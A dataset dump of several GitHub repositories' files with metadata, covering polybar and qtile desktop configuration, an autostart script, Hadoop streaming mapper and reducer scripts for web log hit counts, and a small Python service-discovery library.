&\n\n###########################\n# #\n# -*- UPDATES -*- #\n# #\n###########################\n\n[module/updates]\ntype = custom/script\n\nexec = ~/.config/polybar/my-polybar/scripts/updates.sh\n\n# Will the script output continous content?\ntail = true\n\n# Seconds to sleep between updates.\ninterval = 5\n\n# Available tags:\n# <output> - deprecated\n# <label> (default)\n#format = <label>\nformat-padding = 2\nformat-background = #fff85a\nformat-foreground = #000\nformat-underline = #fffb8f\nformat-overline = #fffb8f\n\n# Available tokens:\n# %output%\n# Default: %output%\n##label = %output:0:15:...%\n\nclick-left = ~/.config/polybar/my-polybar/scripts/lupdates &\nclick-middle = ~/.config/polybar/my-polybar/scripts/lupdates &\nclick-right = ~/.config/polybar/my-polybar/scripts/lupdates &\n\n############################\n# #\n# -*- LAUNCHER -*- #\n# #\n############################\n\n[module/launcher]\ntype = custom/text\ncontent = \n\n# \"content\" has the same properties as \"format-NAME\"\ncontent-background = ${color.ac}\ncontent-foreground = ${color.mf}\ncontent-underline = #fffb8f\ncontent-overline = #fffb8f\ncontent-padding = 3\n\nclick-left = ~/.config/polybar/my-polybar/scripts/launcher\nclick-right = ~/.config/polybar/scripts/my-polybar/launcher-alt\n\n# \"scroll-(up|down)\" will be executed using \"/usr/bin/env sh -c $COMMAND\"\n##scroll-up = ~/.config/polybar/scripts/launcher-full\nscroll-down = ~/.config/polybar/scripts/launcher-full\n\n###########################\n# #\n# -*- SYSMENU -*- #\n# #\n###########################\n\n[module/sysmenu]\ntype = custom/text\ncontent = \n\ncontent-background = ${color.ac}\ncontent-foreground = ${color.mf}\ncontent-underline = #fffb8f\ncontent-overline = #fffb8f\ncontent-padding = 3\n\nclick-left = ~/.config/polybar/my-polybar/scripts/powermenu\nclick-right = ~/.config/polybar/my-polybar/scripts/powermenu-alt\n\n#############################\n# #\n# -*- POWERMENU -*- #\n# #\n#############################\n\n[module/powermenu]\ntype = custom/menu\n\n# If true, <label-toggle> will be to the left of the menu items (default).\n# If false, it will be on the right of all the items.\nexpand-right = true\n\n# \"menu-LEVEL-N\" has the same properties as \"label-NAME\" with\n# the additional \"exec\" property\n#\n# Available exec commands:\n# menu-open-LEVEL\n# menu-close\n# Other commands will be executed using \"/usr/bin/env sh -c $COMMAND\"\nmenu-0-0 = reboot\nmenu-0-0-exec = menu-open-1\nmenu-0-1 = shutdown\nmenu-0-1-exec = 
menu-open-2\n\nmenu-1-0 = back\nmenu-1-0-exec = menu-open-0\nmenu-1-1 = reboot\nmenu-1-1-exec = systemctl reboot\n\nmenu-2-0 = shutdown\nmenu-2-0-exec = systemctl poweroff\nmenu-2-1 = back\nmenu-2-1-exec = menu-open-0\n\n# Available tags:\n# <label-toggle> (default) - gets replaced with <label-(open|close)>\n# <menu> (default)\n# Note that if you use <label-toggle> you must also include\n# the definition for <label-open>\n\n##format = <label-toggle> <menu>\n##format-prefix = ${menu.icon-menu}\nformat-spacing = 1 \n\nlabel-open = \nlabel-close = \n\n# Optional item separator\n# Default: none\nlabel-separator = |\n\nlabel-open-foreground = ${color.ac}\nlabel-close-foreground = ${color.ac}\nlabel-separator-foreground = ${color.ac}\n\n########################\n# #\n# -*- MENU -*- #\n# #\n########################\n\n[module/menu]\ntype = custom/menu\n\n# If true, <label-toggle> will be to the left of the menu items (default).\n# If false, it will be on the right of all the items.\nexpand-right = true\n\n# \"menu-LEVEL-N\" has the same properties as \"label-NAME\" with\n# the additional \"exec\" property\n#\n# Available exec commands:\n# menu-open-LEVEL\n# menu-close\n# Other commands will be executed using \"/usr/bin/env sh -c $COMMAND\"\nmenu-0-0 = Menu\nmenu-0-0-exec = ~/.config/polybar/scripts/launcher &\nmenu-0-1 = Files\nmenu-0-1-exec = thunar &\nmenu-0-2 = Terminal\nmenu-0-2-exec = termite &\nmenu-0-3 = Browser\nmenu-0-3-exec = firefox &\n\n# Available tags:\n# <label-toggle> (default) - gets replaced with <label-(open|close)>\n# <menu> (default)\n# Note that if you use <label-toggle> you must also include\n# the definition for <label-open>\n\n##format = <label-toggle> <menu>\n##format-prefix = ${menu.icon-menu}\nformat-spacing = 1 \n\nlabel-open = \nlabel-close = \n\n\n# Optional item separator\n# Default: none\nlabel-separator = |\n\nlabel-open-foreground = ${color.ac}\nlabel-close-foreground = ${color.ac}\nlabel-separator-foreground = ${color.ac}"
},
{
"alpha_fraction": 0.5057869553565979,
"alphanum_fraction": 0.5179522037506104,
"avg_line_length": 28.01225471496582,
"blob_id": "7bf707ca4c733012f022b724e111706b270bf561",
"content_id": "5dc22cac5e552280dd246841c2d3c766f16a04f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11855,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 408,
"path": "/qtile/config.py",
"repo_name": "angelip2303/config",
"src_encoding": "UTF-8",
"text": "# My qtile config.\n\n# _ U _____ u\n# U /'\\ u \\| ___'|/\n# \\/ _ \\/ | _|'\n# / ___ \\ | |___\n# /_/ \\_\\ |_____|\n# \\\\ >> << >>\n# (__) (__)(__) (__)\n\n# -*- IMPORTS -*-\n\nimport os, socket, subprocess\nfrom libqtile.config import Key, Screen, Group, Drag, Click\nfrom libqtile.lazy import lazy\nfrom libqtile import layout, bar, widget, hook\nfrom typing import List\n\n# -*- VARIABLES -*-\n\nmod = 'mod4'\nprompt = '{0}@{1}: '.format(os.environ['USER'], socket.gethostname())\n\nwmname = 'LG3D' # Assignment made for the DE to work with some java IDEs.\n\n# -*- FONTS -*-\n\nfonts = {\n 'mono-font': 'JetBrainsMono NF',\n 'bar-font': 'JetBrainsMonoMedium NF',\n}\n\n# -*- COLORS -*-\n\n#Dracula color scheme.\ncolors = {\n # Background and Foreground.\n 'background': '#282a36', # 0. grey --> bar(bar-background)\n 'foreground-hc': '#f8f8f2', # 1. white --> prompt(foreground-hc)\n 'foreground-lc': '#000000', # 2. black --> bar(foreground-lc)\n # Borders.\n 'border-non-focus': '#6272a4', # 3. dk-grey --> border(non-focus)\n 'border-focus': '#e1acff', # 4. lt-pink --> border(focus)\n # Widgets.\n 'yellow': '#f1fa8c', # 5. yellow --> bar(hardware-background)\n 'aqua': '#8be9fd', # 6. aqua --> bar(battery-background)\n 'green': '#50fa7b', # 7. green --> bar(volume-background)\n 'red': '#ff5555', # 8. red --> bar(net-background)\n 'orange': '#ffb86c', # 9. orange --> bar(updates-background)\n 'pink': '#ff79c6', # 10. pink --> bar(systray-background)\n}\n\n# -*- APPS -*-\n\nterm = 'termite'\nbrowser = 'firefox'\nvim = 'neovim'\nfile_manager = 'thunar'\n\n# -*- STARTUP -*-\n\[email protected]\ndef autostart():\n home = os.path.expanduser('~/.config/qtile/autostart.sh')\n subprocess.call([home])\n\n# -*- KEYBINDINGS -*-\n\nkeys = [\n # Switch between windows in current stack pane.\n Key([mod], 'k', lazy.layout.down()),\n Key([mod], 'j', lazy.layout.up()),\n \n # Move windows up or down in current stack.\n Key([mod, 'control'], 'k', lazy.layout.shuffle_down()),\n Key([mod, 'control'], 'j', lazy.layout.shuffle_up()),\n\n # Switch window focus to other pane(s) of stack.\n Key([mod], 'space', lazy.layout.next()),\n\n # Swap panes of split stack.\n Key([mod, 'shift'], 'space', lazy.layout.rotate()),\n\n # Open the terminal.\n Key([mod], 'Return', lazy.spawn(term)),\n\n # Toggle between different layouts as defined below.\n Key([mod], 'Tab', lazy.next_layout()),\n Key([mod], 'w', lazy.window.kill()),\n\n # Manage the DE.\n Key([mod, 'control'], 'r', lazy.restart()), # --> refresh.\n Key([mod, 'control'], 'q', lazy.shutdown()), # --> shutdown.\n Key([mod], 'r', lazy.spawncmd()), # --> spawn.\n\n # Spawn rofi d-run.\n Key([mod], 'd', lazy.spawn('rofi -show drun')),\n\n # Media keys.\n Key([], 'XF86AudioMute', os.system('$~/.config/dunst/dunstrc/volume.sh up')),\n Key([], 'XF86AudioRaiseVolume', lazy.spawn('amixer -c 1 -q set Master 5%+')),\n Key([], 'XF86AudioLowerVolume', lazy.spawn('amixer -c 1 -q set Master 5-')),\n Key([], 'XF86AudioNext', lazy.spawn('mpc next')),\n Key([], 'XF86AudioPrev', lazy.spawn('mpc prev')),\n Key([], 'XF86AudioPlay', lazy.spawn('mpc toggle')),\n Key([], 'XF86AudioStop', lazy.spawn('mpc stop')),\n\n # Brightness.\n Key([], 'XF86MonBrightnessUp', lazy.spawn('brightnessctl set +2%')),\n Key([], 'XF86MonBrightnessDown', lazy.spawn('brightnessctl set 2%-')),\n\n # Print-screen.\n Key([], 'Print', lazy.spawn('xfce4-screenshooter')),\n\n # App keys.\n Key([mod], 'b', lazy.spawn(browser)),\n Key([mod], 't', lazy.spawn('task')),\n Key([mod], 'f', 
lazy.spawn(file_manager)),\n]\n\nmouse = [\n Drag([mod], 'Button1', lazy.window.set_position_floating(),\n start=lazy.window.get_position()),\n Drag([mod], 'Button3', lazy.window.set_size_floating(),\n start=lazy.window.get_size()),\n Click([mod], 'Button2', lazy.window.bring_to_front())\n]\n\n# -*- GROUPS -*-\n\ndev = 'DEV'\nweb = 'WEB'\nterm = 'TERM'\n\ndef init_group_names():\n return [\n (dev, {'layout': 'monadtall'}),\n (web, {'layout': 'monadtall'}),\n (term, {'layout': 'monadtall'}),\n ]\n\ndef init_groups():\n return [Group(name, **kwargs) for (name, kwargs) in group_names]\n\nif (__name__ in ['config', '__main__']):\n group_names = init_group_names()\n groups = init_groups()\n\nfor i, (name, kwargs) in enumerate(group_names, 1):\n keys.append(Key([mod], str(i), lazy.group[name].toscreen())) # Change to another group.\n keys.append(Key([mod, 'shift'], str(i), lazy.window.togroup(name))) # Send window to group.\n\n# -*- LAYOUTS -*-\n\nlayout_theme = {\n 'border_width': 2,\n 'margin': 6,\n 'border_focus': colors['border-focus'],\n 'border_normal': colors['border-non-focus']\n}\n\nlayouts = [\n layout.Max(**layout_theme),\n layout.MonadTall(**layout_theme),\n # layout.Stack(num_stacks=2),\n # layout.Bsp(),\n # layout.Columns(),\n # layout.Matrix(),\n # layout.MonadWide(),\n # layout.RatioTile(),\n # layout.Tile(),\n # layout.TreeTab(),\n # layout.VerticalTile(),\n # layout.Zoomy(),\n]\n\n# -*- DEFAULT SETTINGS FOR THE WIDGETS -*-\n\nwidget_defaults = dict(\n font = fonts['bar-font'],\n fontsize = 12,\n padding = 3,\n background = colors['background']\n)\n\nextension_defaults = widget_defaults.copy()\n\n# -*- WIDGETS -*-\n\ndef init_widgets_list():\n return [\n\n # List of groups.\n widget.GroupBox(\n\n # -*- FONT Config -*-\n font = fonts['mono-font'],\n fontsize = 12,\n\n # -*- MARGINS and BORDERS -*-\n margin_x = 0,\n margin_y = 3.5,\n padding_x = 5, # Gap between the frame and the letters: x-axis.\n padding_y = 5, # Gap between the frame and the letters: y-axis.\n borderwidth = 3,\n rounded = False, # Rounded frame or not.\n\n # -*- HIGHLIGHTING -*-\n highlight_method = 'block',\n urgent_alert_method = 'block',\n\n # -*- COLORS -*-\n active = colors['foreground-hc'],\n inactive = colors['foreground-hc'],\n \n this_current_screen_border = colors['pink'], # Color of the selected workspace.\n # this_screen_border = colors['background'],\n # other_current_screen_border = colors['background'],\n # other_screen_border = colors['background'],\n\n background = colors['background']\n ),\n\n # Systray.\n # widget.TextBox(text = '|'),\n widget.Systray(),\n # widget.TextBox(text = ' |'),\n\n # Prompt.\n widget.Prompt(\n prompt = prompt,\n font = fonts['mono-font'],\n padding = 10,\n foreground = colors['foreground-hc'],\n background = colors['background']\n ),\n\n # Separator.\n widget.Sep(\n linewidth = 0, #To make it invisible.\n padding = 6 #Length with respect to the left most border.\n ),\n\n # Window name.\n widget.WindowName(),\n\n ######################\n # RIGHT-MOST WIDGETS #\n ######################\n\n # Hardware USAGE.\n # Memory.\n widget.TextBox(\n text = ' ',\n fontsize = 15,\n foreground = colors['foreground-lc'],\n background = colors['yellow']\n ),\n widget.Memory(\n foreground = colors['foreground-lc'],\n background = colors['yellow']\n ),\n\n # CPU.\n widget.TextBox(\n text = ' ',\n fontsize = 15,\n foreground = colors['foreground-lc'],\n background = colors['yellow']\n ),\n widget.CPU(\n format = '{freq_current}GHz {load_percent}%',\n foreground = 
colors['foreground-lc'],\n background = colors['yellow'],\n padding = 5\n ),\n\n #Separation between widgets.\n widget.Sep(linewidth = 0, padding = 4),\n\n # Battery.\n widget.TextBox(\n text = ' ',\n foreground = colors['foreground-lc'],\n background = colors['aqua']\n ),\n widget.Battery(\n format = '{percent:2.0%}',\n foreground = colors['foreground-lc'],\n background = colors['aqua'],\n update_delay = 5,\n padding = 5\n ),\n\n #Separation between widgets.\n widget.Sep(linewidth = 0, padding = 4),\n\n # Volume.\n widget.TextBox(\n text = str(' '),\n fontsize = 15, \n foreground = colors['foreground-lc'],\n background = colors['green']\n ),\n widget.Volume(\n foreground = colors['foreground-lc'],\n background = colors['green'],\n padding = 5\n ),\n\n #Separation between widgets.\n widget.Sep(linewidth = 0, padding = 4),\n\n # Net.\n\n # widget.TextBox(\n # text = ' ',\n # foreground = colors['foreground-lc'],\n # background = colors['red']\n # ),\n # widget.Net(\n # foreground = colors['foreground-lc'],\n # background = colors['red'],\n # format = '{down} ↓↑ {up}',\n # padding = 5\n # ),\n #\n # Separation between widgets.\n # widget.Sep(linewidth = 0, padding = 6),\n\n # Packages to update.\n widget.TextBox(\n text = ' ',\n fontsize = 18, \n foreground = colors['foreground-lc'],\n background = colors['orange']\n ),\n widget.Pacman(\n execute = 'alacritty',\n update_interval = 1800,\n foreground = colors['foreground-lc'],\n background = colors['orange'],\n padding = 5\n ),\n\n #Separation between widgets.\n widget.Sep(linewidth = 0, padding = 4),\n\n # Clock.\n widget.TextBox(\n text = ' ',\n foreground = colors['foreground-lc'],\n background = colors['pink']\n ),\n widget.Clock(\n format='%A, %B %d [ %H:%M ]',\n foreground = colors['foreground-lc'],\n background = colors['pink'],\n padding = 5\n ),\n ]\n\n# -*- SCREENS -*-\n\n # --> Im loading the setup for a dual monitor.\n\ndef init_widgets_screen1():\n return init_widgets_list()\n\ndef init_widgets_screen2():\n return init_widgets_list()\n\ndef init_screens():\n return [\n Screen(top=bar.Bar(widgets=init_widgets_screen1(), opacity=0.95, size=20)),\n Screen(top=bar.Bar(widgets=init_widgets_screen2(), opacity=0.95, size=20))\n ]\n\nif __name__ in ['config', '__main__']:\n screens = init_screens()\n\n# -*- FLOATING WINDOWS -*-\n\ndgroups_key_binder = None\ndgroups_app_rules = [] # type: List\nmain = None\nfollow_mouse_focus = True\nbring_front_click = False\ncursor_warp = False\nfloating_layout = layout.Floating(float_rules=[\n # Run the utility of `xprop` to see the wm class and name of an X client.\n {'wmclass': 'confirm'},\n {'wmclass': 'dialog'},\n {'wmclass': 'download'},\n {'wmclass': 'error'},\n {'wmclass': 'file_progress'},\n {'wmclass': 'notification'},\n {'wmclass': 'splash'},\n {'wmclass': 'toolbar'},\n {'wmclass': 'confirmreset'}, # gitk\n {'wmclass': 'makebranch'}, # gitk\n {'wmclass': 'maketag'}, # gitk\n {'wname': 'branchdialog'}, # gitk\n {'wname': 'pinentry'}, # GPG key password entry\n {'wmclass': 'ssh-askpass'}, # ssh-askpass\n])\nauto_fullscreen = True\nfocus_on_window_activation = 'smart'\n"
},
{
"alpha_fraction": 0.5766567587852478,
"alphanum_fraction": 0.5825914740562439,
"avg_line_length": 23.658536911010742,
"blob_id": "66649d3f702315a9bb3187445160669a00f84327",
"content_id": "7086e94549e8638f5e5153e33a05e5b1bb9e87ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1011,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 41,
"path": "/qtile/autostart.sh",
"repo_name": "angelip2303/config",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\n# -*- WALLPAPERS -*-\n\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper1.jpg &\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper2.png &\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper3.png &\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper4.jpg &\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper5.jpg &\nfeh --bg-scale ~/.config/qtile/wallpapers/wallpaper6.jpg &\n\n# -*- STARTUP -*-\n\n #########\n # PICOM #\n #########\n\n # If picom is running, kill it to prevent multiple instances.\n if ps -A | grep picom; then\n killall -q picom\n fi\n\n # Load picom\n exec picom --experimental-backends --config ~/.config/picom/picom.conf &\n \n #########\n # DUNST #\n #########\n\n # If dunst is running, kill it to prevent multiple instances.\n if ps -A | grep dunst; then\n killall -q dunst\n fi\n \n dunst -config ~/.config/dunst/dunstrc/dunstrc &\n\n #############\n # NM-APPLET #\n #############\n\n exec --no-startup-id nm-applet\n"
}
] | 7 |
anderskev/intro_hadoop
|
https://github.com/anderskev/intro_hadoop
|
388c3c9e461cfebf6a1c7aa445ae08cc7e0ba3ac
|
224bd91b12347f123929fda6e84a923283fe9ccc
|
c051bb20ad593b7f2ae75309dba87f78b4ae5666
|
refs/heads/master
| 2016-09-11T08:57:02.811245 | 2015-07-15T22:42:17 | 2015-07-15T22:42:17 | 39,035,342 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5727109313011169,
"alphanum_fraction": 0.5924596190452576,
"avg_line_length": 25.5238094329834,
"blob_id": "cf3c1718e82c6279ee9fa71e2775906b2a1fd321",
"content_id": "fa1e7c510dee812e6941140290535ce9f29600ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 557,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 21,
"path": "/project3_q1/most.py",
"repo_name": "anderskev/intro_hadoop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport sys\ntop_requests = []\ntop_hits = 0\nq1_hits = 0\n\nfor line in sys.stdin:\n request, hits = line.strip().split(\"\\t\")\n if int(hits) > top_hits:\n top_requests = []\n top_requests.append((request, hits))\n top_hits = int(hits)\n elif int(hits) == top_hits:\n top_requests.append((request, hits))\n if request == \"/assets/js/the-associates.js\":\n print \"{0}\\t{1}\".format(request, hits)\n q1_hits = int(hits)\n\nfor item in top_requests:\n print\"{0}\\t{1}\".format(item[0],item[1])\nprint q1_hits\n"
},
{
"alpha_fraction": 0.5896739363670349,
"alphanum_fraction": 0.60326087474823,
"avg_line_length": 23.53333282470703,
"blob_id": "1efc20ae164706c71be8349dcd7f8c50e715b66e",
"content_id": "f98f70fe65163fc1aa6899155f322c83688b9b4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 368,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 15,
"path": "/most.py",
"repo_name": "anderskev/intro_hadoop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport sys\ntop_requests = []\ntop_hits = 0\n\nfor line in sys.stdin:\n request, hits = line.strip().split(\"\\t\")\n if hits > top_hits:\n top_requests = []\n top_requests.append((request, hits))\n elif hits == top_hits:\n top_requests.append(request, hits))\n\nfor item in top_requests:\n print\"\\{0}\\t\\{1}\".format(item[0],item[1])\n"
},
{
"alpha_fraction": 0.5768321752548218,
"alphanum_fraction": 0.5933806300163269,
"avg_line_length": 17.39130401611328,
"blob_id": "0b33294795f5cbc72e35524317611da767b0d7c1",
"content_id": "6ec0efd619a4eae1fdcd3195beaaf0d2e319840a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 423,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 23,
"path": "/project3_q1/reducer.py",
"repo_name": "anderskev/intro_hadoop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport sys\n\npageHits = 0\noldKey = None\n\nfor line in sys.stdin:\n data = line.strip().split(\"\\t\")\n\n if len(data) != 2:\n continue\n\n thisKey, theseHits = data\n\n if oldKey and oldKey != thisKey:\n print \"{0}\\t{1}\".format(oldKey, str(pageHits))\n pageHits = 0\n\n oldKey = thisKey\n pageHits += int(theseHits)\n\nif oldKey != None:\n print \"{0}\\t{1}\".format(oldKey, pageHits)\n"
},
{
"alpha_fraction": 0.5199999809265137,
"alphanum_fraction": 0.5479999780654907,
"avg_line_length": 21.727272033691406,
"blob_id": "32d602bb07d22b75c43f2e25b63d4ed152738897",
"content_id": "3a78fd912fc07d931137bf1ea387ac2ebc2ccb12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 250,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 11,
"path": "/project3_q3/mapper.py",
"repo_name": "anderskev/intro_hadoop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport sys\n\nfor line in sys.stdin:\n data = line.split(\" \")\n if len(data) == 10:\n request = data[6]\n if request[:31] == \"http://www.the-associates.co.uk\":\n request = request[31:]\n print request\n"
},
{
"alpha_fraction": 0.5159574747085571,
"alphanum_fraction": 0.5478723645210266,
"avg_line_length": 19.88888931274414,
"blob_id": "f5a5b9b392879fdceb7aee14f7ed575f71e88acf",
"content_id": "75075f2c41c9baa2c38ead7be44afc6ef3b2fbcd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 188,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 9,
"path": "/project3_q1/mapper.py",
"repo_name": "anderskev/intro_hadoop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport sys\n\nfor line in sys.stdin:\n data = line.split(\" \")\n if len(data) == 10:\n ip, request = data[0], data[6]\n print \"{0} {1}\".format(ip, request)\n"
},
{
"alpha_fraction": 0.5409556031227112,
"alphanum_fraction": 0.5614334344863892,
"avg_line_length": 16.75757598876953,
"blob_id": "af893c97b5d3782da571283da9ccacd53f5580bc",
"content_id": "2704cb40a222c6b9a0093095de56e1068c0cc3bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 586,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 33,
"path": "/project3_q3/reducer.py",
"repo_name": "anderskev/intro_hadoop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport sys\n\nhits = 0\noldKey = None\nranks = []\n\nfor line in sys.stdin:\n data = line.strip()\n\n #if len(data) != 1:\n # continue\n\n thisKey = data\n \n if oldKey and oldKey != thisKey:\n print \"{0}\\t{1}\".format(oldKey, hits)\n ranks.append((oldKey,int(hits)))\n hits = 0\n\n oldKey = thisKey\n hits += 1\n\nif oldKey != None:\n print \"{0}\\t{1}\".format(oldKey, hits)\n\ntop_hits = 0\ntop_request = \"\"\nfor item in ranks:\n if item[1] > top_hits:\n top_hits = item[1]\n top_request = item[0]\nprint top_request, str(top_hits)\n"
}
] | 6 |
jolynch/service_discovery
|
https://github.com/jolynch/service_discovery
|
de26388fdb6cb8e9877cbb7cc27f7a15d8095d54
|
36e033662565ff6c2b0adbce843eb3acd98b25de
|
24b23d9e43ec86c80dfaf3626675eb7db32094f9
|
refs/heads/master
| 2021-01-01T05:42:05.220142 | 2015-01-21T21:43:00 | 2015-01-21T21:43:00 | 28,356,615 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7119784951210022,
"alphanum_fraction": 0.7126514315605164,
"avg_line_length": 35.24390411376953,
"blob_id": "68f3d96556acb88cf5ed2d568f9425ca412b0a1a",
"content_id": "d54b8df8f9baf3b21add09611cba2e8a15cd4fd3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1486,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 41,
"path": "/service_discovery/providers/base_provider.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import print_function, absolute_import, division\nfrom abc import ABCMeta, abstractmethod\n\n\nclass BaseServiceProvider(object):\n \"\"\"The abstraction on service discovery.\n\n This is the interface that all providers of service discovery must provide,\n whether it be looking in a file, DNS, environment variables, or whatever\n the implementer decides. If you implement this interface, service_discovery\n can allow your clients to be discovered.\n \"\"\"\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def provide_all_service_addresses(self, service_name):\n \"\"\"Provide an iterable of ServiceAddress objects\"\"\"\n raise NotImplementedError(\n 'You must implement provide_all_service_addresses'\n )\n\n @abstractmethod\n def provide_service_address(self, service_name):\n \"\"\"Provide a single ServiceAddress object corresponding to\n service_name\"\"\"\n raise NotImplementedError('You must implement provide_service_address')\n\n\nclass InjectableServiceProvider(object):\n \"\"\"The abstraction on service discovery injection.\n\n This is the interface that providers of service discovery *may* provide if\n they wish to be the system used to inject.\n \"\"\"\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def inject(self, service_address):\n \"\"\"Inject a single ServiceAddress into the mapping\"\"\"\n raise NotImplementedError('You must implement provide_service_address')\n"
},
{
"alpha_fraction": 0.689497709274292,
"alphanum_fraction": 0.689497709274292,
"avg_line_length": 12.6875,
"blob_id": "7c4cf60a60e2fcfb0d1ab502f447ba7e4ea607e3",
"content_id": "9f551378433a536fa827ea3b6bfb7215641e7f49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 219,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 16,
"path": "/Makefile",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": ".PHONY: all production web cmd test tests clean\n\nall: production\n\nproduction:\n\t@true\n\ntests: test\n\ntest:\n\ttox\n\nclean:\n\trm -rf service_discovery.egg-info\n\tfind . -name '*.pyc' -delete\n\tfind . -name '__pycache__' -delete\n"
},
{
"alpha_fraction": 0.7060241103172302,
"alphanum_fraction": 0.7349397540092468,
"avg_line_length": 40.5,
"blob_id": "af70c4c51abafa1455597a7ba394f5d6b64e4668",
"content_id": "bc7cd5040ee0d4a2ef870520f9d8d68f46e454b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 415,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 10,
"path": "/tests/test_service_address.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "from service_discovery.service_address import ServiceAddress\n\n\ndef test_contract():\n service_address = ServiceAddress('test_service', 'localhost', 1234)\n assert service_address.service_name == 'test_service'\n assert service_address.host == 'localhost'\n assert service_address.port == 1234\n assert service_address.provenance == 'Unknown'\n assert service_address.get_host_port() == 'localhost:1234'\n"
},
{
"alpha_fraction": 0.6693548560142517,
"alphanum_fraction": 0.6754032373428345,
"avg_line_length": 25.105262756347656,
"blob_id": "7cc57ae26545791c227042d07e865fa99486d805",
"content_id": "51b21f7c5853e3e8a65cbbe54bac5f9410f4e3b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 496,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 19,
"path": "/setup.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom setuptools import find_packages\nfrom setuptools import setup\n\nsetup(\n name='service_discovery',\n version='0.1.0',\n description='An abstraction layer on service discovery',\n author='Joseph Lynch',\n author_email='[email protected]',\n url='https://github.com/jolynch/cluster_commander.git',\n packages=find_packages(exclude=['tests', 'bin']),\n include_package_data=True,\n setup_requires=['setuptools'],\n install_requires=[\n ],\n license='MIT License'\n)\n"
},
{
"alpha_fraction": 0.6317376494407654,
"alphanum_fraction": 0.6366377472877502,
"avg_line_length": 36.900001525878906,
"blob_id": "3aa024a0aa114c5cc096be15fe791f56d74cbc70",
"content_id": "36f3f3be7e6065602886f106f622cf661148a4a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2653,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 70,
"path": "/service_discovery/providers/env_provider.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import print_function, absolute_import, division\nfrom service_discovery.providers.base_provider import BaseServiceProvider\nfrom service_discovery.providers.base_provider import InjectableServiceProvider\n\nfrom service_discovery.service_address import ServiceAddress\nimport os\n\n\nclass EnvServiceProvider(BaseServiceProvider, InjectableServiceProvider):\n \"\"\"Provide services from the SERVICE_INJECT_MAP environment variable\n\n The map must look like:\n <service_name>?host:port,host:port...%<service_name>?host:port,host:port...\n\n For example:\n SERVICE_INJECT_MAP=query_lm?search2-devc:14902%federator?localhost:31337\n\n In addition if asked for a service not in the map SERVICE_%name% will be\n looked up, expecting the format:\n SERVICE_%name%=host:port,host:port...\n \"\"\"\n def __init__(self, env=None):\n self.env = env\n if self.env is None:\n self.env = os.environ\n\n self.services = {}\n injection_map = self.env.get('SERVICE_INJECT_MAP', '')\n\n if injection_map:\n injections = injection_map.split('%')\n for injection in injections:\n service_name, service_host_ports = injection.split('?')\n addrs = EnvServiceProvider.__parse_service_injection(\n service_name, service_host_ports\n )\n self.services[service_name] = addrs\n\n @staticmethod\n def __parse_service_injection(service_name, service_host_ports):\n if service_host_ports:\n return [\n ServiceAddress.from_host_port(\n service_name, host_port, provenance=__name__\n ) for host_port in service_host_ports.split(',')\n ]\n return []\n\n def inject(self, service_address):\n self.services[service_address.service_name] = [service_address]\n return True\n\n def provide_all_service_addresses(self, service_name):\n service_addresses = self.services.get(service_name)\n if service_addresses is None:\n service_host_ports = self.env.get(\n 'SERVICE_{name}'.format(name=service_name.upper()), ''\n )\n service_addresses = EnvServiceProvider.__parse_service_injection(\n service_name, service_host_ports\n )\n self.services[service_name] = service_addresses\n return service_addresses\n\n def provide_service_address(self, service_name):\n service_addresses = self.provide_all_service_addresses(service_name)\n if service_addresses:\n return service_addresses[0]\n return 